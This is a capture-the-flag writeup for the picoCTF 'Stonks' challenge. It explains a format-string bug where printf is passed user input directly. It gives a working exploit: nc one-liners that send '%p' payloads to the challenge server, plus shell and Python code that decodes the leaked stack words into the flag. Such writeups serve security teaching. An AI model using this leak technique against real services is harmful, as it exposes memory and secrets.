picoCTF Stonks writeup

Compile and run it:

gcc vuln.c

If the flag is not found locally, it must be on the remote server. Create a placeholder api file so the binary can be run locally:

python3 -c 'print("A" * 200)' > api

It runs fine with the placeholder.

char *user_buf = malloc(300 + 1); // Allocates memory for the token
printf("What is your API token?\n"); // Prints the input prompt
scanf("%300s", user_buf); // Reads the user input and stores it in user_buf
printf("Buying stonks with token:\n"); // Prints info
printf(user_buf); // Passes user_buf as the format string [VULNERABLE!!]

As we can see, no format string is supplied: the user-controlled buffer is passed to printf as the format string itself.

printf(user_buf) will therefore interpret any conversion specifiers (such as %p) contained in the token.

Remote Attack:

python3 -c 'print("1\n" + "%p." * 50)' | nc mercury.picoctf.net 33411 | tr "." "\n" | xxd -r -p | strings -n1
python3 -c 'print("1\n" + "%p." * 50)' | nc mercury.picoctf.net 33411 | tr "." "\n" | while read line; do echo $line | xxd -r -p | strings -n1 | rev; done | tr -d "\n" | grep -oE "picoCTF{.*}"
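The decoding the shell pipeline above performs, as an added Python example that is not part of the original writeup. It assumes an x86-64 target, so each %p leaks one 8-byte little-endian stack word, and it fabricates a constructed sample of the service output instead of contacting the server.

```python
import re
from typing import Optional

# Constructed flag, used only to fabricate a sample of the service output.
SAMPLE_FLAG = b"picoCTF{this_is_a_constructed_flag}"
WORD = 8  # assumption: x86-64 target, so each %p leaks one 8-byte stack word


def build_sample_leak(flag: bytes) -> str:
    """Fabricate what the service echoes back for a "%p." * N token.

    Real-looking pointers are interspersed with the flag bytes, which sit
    on the stack as little-endian words; glibc prints NULL words as "(nil)".
    """
    words = ["0x7ffd1b2c3d40", "(nil)", "0x1", "0x55c7ab1f22a0"]
    padded = flag + b"\x00" * (-len(flag) % WORD)
    for i in range(0, len(padded), WORD):
        value = int.from_bytes(padded[i:i + WORD], "little")
        words.append(f"{value:#x}")  # same formatting as printf("%p")
    words.append("0x7ffd1b2c3e80")
    return "Buying stonks with token:\n" + ".".join(words) + ".\n"


def decode_leak(output: str, width: int = WORD) -> bytes:
    """Turn the %p output back into the raw stack bytes.

    Each printed word is a native integer, so its bytes come out little-endian
    (this is what `rev` on every hex line did in the shell pipeline). "(nil)"
    is a zero word and must keep its place, otherwise a string that straddles
    it would be misaligned.
    """
    stack = bytearray()
    for token in re.findall(r"0x[0-9a-fA-F]+|\(nil\)", output):
        value = 0 if token == "(nil)" else int(token, 16)
        stack += value.to_bytes(width, "little")
    return bytes(stack)


def find_flag(output: str) -> Optional[str]:
    """Search the reconstructed stack bytes for a picoCTF{...} string."""
    m = re.search(rb"picoCTF\{[^}]*\}", decode_leak(output))
    return m.group(0).decode() if m else None


if __name__ == "__main__":
    sample = build_sample_leak(SAMPLE_FLAG)
    print(sample)
    print(find_flag(sample))
```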



